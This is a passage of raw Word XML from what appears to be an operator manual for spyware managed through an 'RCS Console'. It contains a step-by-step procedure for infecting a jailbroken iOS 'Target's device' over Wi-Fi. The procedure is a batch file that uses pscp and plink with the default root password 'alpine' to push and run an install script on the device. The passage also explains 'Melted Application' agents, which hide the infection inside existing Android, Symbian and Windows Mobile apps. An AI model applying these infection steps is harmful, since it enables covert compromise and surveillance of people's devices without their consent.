            <wp:effectExtent l="0" t="0" r="825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0C40C0" w:rsidRPr="002D7F2D" w:rsidRDefault="000C40C0" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="8"/>
          <w:szCs w:val="8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C40C0" w:rsidRPr="002D7F2D" w:rsidRDefault="00117549" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9.3</w:t>
      </w:r>
      <w:r w:rsidR="000C40C0" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ RCS Console ] Operations &gt; </w:t>
      </w:r>
      <w:r w:rsidR="000C40C0" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Operation #</w:t>
      </w:r>
      <w:r w:rsidR="000C40C0" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="000C40C0" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Target #</w:t>
      </w:r>
      <w:r w:rsidR="000C40C0" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="000C40C0" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:i/>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t># Factory #</w:t>
      </w:r>
      <w:r w:rsidR="000C40C0" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; Build (</w:t>
      </w:r>
      <w:r w:rsidR="00D96EE4">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Installation Package</w:t>
      </w:r>
      <w:r w:rsidR="000C40C0" w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C40C0" w:rsidRDefault="000C40C0" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C40C0" w:rsidRDefault="000C40C0" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000C40C0" w:rsidRDefault="000C40C0" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Depending on the Target’s platform, may be available sub-parameters to customize the infection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C40C0" w:rsidRDefault="000C40C0" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>These sub-parameters will be explained in detail during the training.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="0010351B" w:rsidP="000C40C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="0010351B" w:rsidP="0010351B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On the following page you can find a short how-to for </w:t>
      </w:r>
      <w:r w:rsidR="00C91870">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">infecting an iOS Target’s device via </w:t>
      </w:r>
      <w:r w:rsidR="008E44B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00C91870">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i-</w:t>
      </w:r>
      <w:r w:rsidR="008E44B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00C91870">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00C91870">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>this infection vector.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="0010351B">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRPr="003D5FA9" w:rsidRDefault="0010351B" w:rsidP="0010351B">
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc372642518"/>
      <w:r w:rsidRPr="003D5FA9">
        <w:lastRenderedPageBreak/>
        <w:t>How to: Infect iOS Platform Via Wi-Fi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="0010351B" w:rsidP="0010351B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002F05C3" w:rsidRDefault="002F05C3" w:rsidP="002F05C3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In order to apply the </w:t>
      </w:r>
      <w:r w:rsidR="008E44B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i-</w:t>
      </w:r>
      <w:r w:rsidR="008E44B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i infection described below, you’ve to connect a Windows computer to the same wireless network to which is connected the iOS device.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F05C3" w:rsidRPr="002F05C3" w:rsidRDefault="002F05C3" w:rsidP="002F05C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="00EC4D7A" w:rsidP="0010351B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create a new Installation Package Agent for iOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="001F6D35" w:rsidP="0010351B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Uncompress the Agent .ZIP file </w:t>
      </w:r>
      <w:r w:rsidR="00F92B36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">generated from the Console </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00F92B36">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">identify the folder  </w:t>
      </w:r>
      <w:r w:rsidR="00F92B36" w:rsidRPr="00F92B36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IOS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="00F92B36" w:rsidP="0010351B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Download  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F92B36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pscp.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  and  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F92B36">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plink.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  files from PuTTY Download Page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F92B36" w:rsidRDefault="003A4380" w:rsidP="00F92B36">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId328" w:history="1">
        <w:r w:rsidR="00F92B36">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
          </w:rPr>
          <w:t>http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F92B36" w:rsidRDefault="00F92B36" w:rsidP="00F92B36">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and copy both files</w:t>
      </w:r>
      <w:r w:rsidR="008A00CA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside</w:t>
      </w:r>
      <w:r w:rsidR="00A0468A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the  </w:t>
      </w:r>
      <w:r w:rsidR="00A0468A" w:rsidRPr="00A0468A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IOS</w:t>
      </w:r>
      <w:r w:rsidR="00A0468A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  folder previously generated by the Console</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="00A0468A" w:rsidP="0010351B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Within the  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0468A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  folder create a new batch file </w:t>
      </w:r>
      <w:r w:rsidR="003024DA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A0468A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>installer.bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003024DA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="003024DA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add these lines of code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0468A" w:rsidRPr="00C949DB" w:rsidRDefault="00C949DB" w:rsidP="00A0468A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C949DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set IP=</w:t>
      </w:r>
      <w:r w:rsidRPr="002F05C3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>123.123.123.123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0468A" w:rsidRPr="00C949DB" w:rsidRDefault="00C949DB" w:rsidP="00A0468A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C949DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">pscp -l root -v -pw </w:t>
      </w:r>
      <w:r w:rsidRPr="002F05C3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alpine</w:t>
      </w:r>
      <w:r w:rsidRPr="00C949DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r * %IP%:/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C949DB" w:rsidRPr="00C949DB" w:rsidRDefault="00C949DB" w:rsidP="00A0468A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C949DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">plink %IP% -l root -v -pw </w:t>
      </w:r>
      <w:r w:rsidR="002F05C3" w:rsidRPr="002F05C3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alpine</w:t>
      </w:r>
      <w:r w:rsidRPr="00C949DB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> "cd /tmp; sh ./install.sh"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="003024DA" w:rsidP="0010351B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Modify </w:t>
      </w:r>
      <w:r w:rsidR="00911B85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the words highlighted </w:t>
      </w:r>
      <w:r w:rsidR="008E44B2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">in yellow with the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>following rules:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003024DA" w:rsidRDefault="002F05C3" w:rsidP="003024DA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00911B85">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>123.123.123.123</w:t>
      </w:r>
      <w:r w:rsidR="00911B85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: change it with the local </w:t>
      </w:r>
      <w:r w:rsidR="003024DA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">IP address of the iOS Target’s device </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F05C3" w:rsidRDefault="002F05C3" w:rsidP="003024DA">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00911B85">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alpine</w:t>
      </w:r>
      <w:r w:rsidR="00911B85">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: change it with the jailbreak password (</w:t>
      </w:r>
      <w:r w:rsidR="000F5A4E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F05C3">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>alpine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F5A4E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is the default one)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="000F5A4E" w:rsidP="0010351B">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="714" w:hanging="357"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the  </w:t>
      </w:r>
      <w:r w:rsidRPr="000F5A4E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>installer.bat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="0010351B" w:rsidP="0010351B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="0010351B" w:rsidP="0010351B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Requirements: Windows </w:t>
      </w:r>
      <w:r w:rsidR="002863A0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XP/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vista/7/8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0010351B" w:rsidRDefault="0010351B">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00A76B3F">
      <w:pPr>
        <w:pStyle w:val="Titolo2"/>
        <w:rPr>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc372642519"/>
      <w:r w:rsidRPr="003E0ADB">
        <w:lastRenderedPageBreak/>
        <w:t>Melted Application Explanation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w:rsidR="00A26424" w:rsidRDefault="00A26424" w:rsidP="00A26424">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634565" w:rsidRDefault="00634565" w:rsidP="00634565">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D7F2D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Melted Application Agent allows to create an executable file suitable for the selected platform that will install the infection vector on the Target’s device starting from an </w:t>
      </w:r>
      <w:r w:rsidRPr="00163021">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>existing application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, inserting the infection vector into it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634565" w:rsidRDefault="00634565" w:rsidP="00634565">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634565" w:rsidRPr="002D7F2D" w:rsidRDefault="00634565" w:rsidP="00634565">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Melted Application Agent is available for 3 platforms: Android, Symbian and Windows Mobile.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00634565" w:rsidRPr="002D7F2D" w:rsidRDefault="00634565" w:rsidP="00634565">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00634565" w:rsidRPr="002D7F2D" w:rsidRDefault="00634565" w:rsidP="00634565">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4050000" cy="3240000"/>
